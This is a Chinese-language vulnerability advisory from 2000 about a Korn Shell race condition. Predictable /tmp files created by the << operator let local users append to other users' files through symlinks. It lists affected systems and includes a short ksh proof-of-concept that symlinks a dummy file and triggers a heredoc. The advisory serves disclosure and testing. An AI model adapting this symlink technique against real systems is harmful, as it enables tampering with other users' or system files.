Korn Shell 输入重定向竞争条件漏洞
发布日期:2000-12-25
更新日期:2000-12-25
受影响系统:
Digital (Compaq) TRU64/DIGITAL UNIX 5.0
HP HP-UX 9.0
SGI IRIX 6.5.7
SGI IRIX 6.5.5
SGI IRIX 6.2
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
不受影响系统:
HP HP-UX 11.0
Sun Solaris 8.0
描述:
Korn Shell 是广泛使用的多功能的 shell,随 UNIX 操作
系统家族中的大多数成员一起发行。它存在一个问题,这个
问题使得本地用户可以向其它用户的文件里附加内容。
问题发生在输入输出重定向操作符 << 上。使用 << 操作符
时,脚本和命令行命令可以在 /tmp 目录里不安全地创建文
件,特别是以 tmp.<pid> 为文件名创建文件。这里的 pid
是进程号。可以在 /tmp 目录里用前面所说的文件名创建一
个符号连接文件,然后用 << 操作就可以向符号连接指向的
文件里附加内容了。这个设计漏洞使得恶意用户可以破坏其
它用户的文件,或者向敏感系统文件里附加内容。
<*来源:Paul Szabo (
psz@maths.usyd.edu.au) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*
建议:
厂商补丁:
暂无
浏览次数:4800
严重程度:0(网友投票)